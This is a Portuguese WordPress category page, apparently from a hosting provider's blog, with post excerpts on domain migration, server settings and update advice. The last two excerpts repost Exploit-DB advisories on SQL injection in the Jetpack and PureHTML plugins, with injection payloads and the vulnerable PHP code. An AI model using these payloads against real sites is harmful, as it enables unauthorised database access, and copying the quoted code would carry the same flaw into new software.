Browsed by
Categoria: Wordpress

Migrando WordPress de Domínio

Migrando WordPress de Domínio

Se deseja mudar o domínio ou está interessado em fazer um backup e instalar em um servidor local do WordPress, será necessário fazer a troca de endereço do blog. Além da cópia de todos os arquivos, será necessário atualizar algumas informações no banco de dados para fazer a troca de domínios. Para isso a maneira mais rápida é através da edição do banco de dados, veja a seguir o passo a passo de como fazê-lo de maneira prática, rápida e…

Read More Read More

Por que criar seu site em WordPress?

Por que criar seu site em WordPress?

Mesmo que você não seja um entendido no assunto, provavelmente já ouviu falar do WordPress. A plataforma é hoje a mais popular do mundo para a construção e desenvolvimento de websites, desde blogs ou sites corporativos até complexos sistemas e lojas virtuais. Mas o que é o WordPress afinal? Bem, antes de tudo, é preciso diferenciar o WordPress.com, que é uma plataforma online na qual você pode montar, gratuitamente, seu blog (como o Blogger ou o Tumblr), do WordPress.org. Nesse…

Read More Read More

Blank Pages no WordPress, como sanar?

Blank Pages no WordPress, como sanar?

Passos para Sanar o Problema:   1 – Entre no WHM como root, 2 – Siga os menus e submenus (->)  Home (Início) -> Service Configuration -> PHP Configuration Editor, 3 – Localize o item Memory_Limit, esse deve possuir PELO MENOS 320mb (sim, há plugins pesados que consomem muita ram), 4 – Localize Upload_max_filesize, apesar de não influenciar aqui, no momento de uploads você pode se dar mal, deixe pelo menos 500MB (nossa hospedagem permite 2gb de upload), 5 – Localize…

Read More Read More

Qualquer conexão com WordPress vem o erro ao XXX wordpress Ocorreu um erro inesperado.

Qualquer conexão com WordPress vem o erro ao XXX wordpress Ocorreu um erro inesperado.

Se você está recebendo a mensagem -> Ocorreu um erro inesperado (unexpected error) <— ao tentar fazer QUALQUER coisa remota do wordpress (instalar uma versão, atualizar um plugin, instalar um plugin, ver o Akismet e etc) nem se preocupe, a saída é simples e clara: 1 – Veja se a porta de saída 80 está liberada no seu firewall (bom deixar também a 443 de SSL), 2 – Veja se as pastas do wordpress estão com permissão correta (755 sob suExec…

Read More Read More

Dica de segurança: Por que devo atualizar meu WordPress, Joomla, Drupal ou qualquer gestor de conteúdos web?

Dica de segurança: Por que devo atualizar meu WordPress, Joomla, Drupal ou qualquer gestor de conteúdos web?

Recentemente foi publicada na Icentral uma forma de inibir a frequência de ataques realizados a sites que usam Gestores de Conteúdos (mais conhecidos como CMS). A dica é simples e facilmente compreendida, recomendamos a leitura fortemente. Para acessar o conteúdo clique no link abaixo: http://icentral.com.br/blog/qual-motivo-de-atualizar-um-cms-no-meu-host-quer-seja-wordpress-joomla-drupal-e-etc/

WordPress jetpack plugin SQL Injection Vulnerability

WordPress jetpack plugin SQL Injection Vulnerability

###################################################### # Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability # Date: 2011-19-11 # Author: longrifle0x # software: WordPress # Download:http://wordpress.org/extend/plugins/jetpack/ # Tools: SQLMAP ###################################################### *DESCRIPTION Discovered a vulnerability in  jetpack, WordPress Plugin, vulnerability is SQL injection. File:wp-content/plugins/jetpack/modules/sharedaddy.php Exploit: id=-1; or 1=if *Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user=’None’ LIMIT 0,1)=’Y’) THEN 1 ELSE 0 END) http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][MID((VERSION()),1,6)   Fonte: http://www.exploit-db.com/exploits/18126/

WordPress PureHTML plugin <= 1.0.0 SQL Injection

WordPress PureHTML plugin <= 1.0.0 SQL Injection

# Exploit Title: WordPress PureHTML plugin < = 1.0.0 SQL Injection Vulnerability # Date: 2011-08-31 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip # Version: 1.0.0 (tested) # Note: magic_quotes has to be turned off ————— PoC (POST data) ————— http://www.site.com/wp-content/plugins/pure-html/alter.php PureHTMLNOnce=1&action=delete&id=-1′ AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— if(!isset($_POST[‘PureHTMLNOnce’])){ if ( !dbunixwp_verify_nonce( $_POST[‘PureHTMLNOnce’], plugin_basename(__FILE__) )) {header(“location:”.$refer);} } else{ … if(isset($_POST[‘id’])){$id = $_POST[‘id’];}else{$id=’0′;} … $action = $_POST[‘action’]; #delete if($action == “delete”){ $sql = “delete from “.$wpdb->prefix.”pureHTML_functions WHERE id=’”.$id.”‘”; $wpdb->query($wpdb->prepare($sql));…

Read More Read More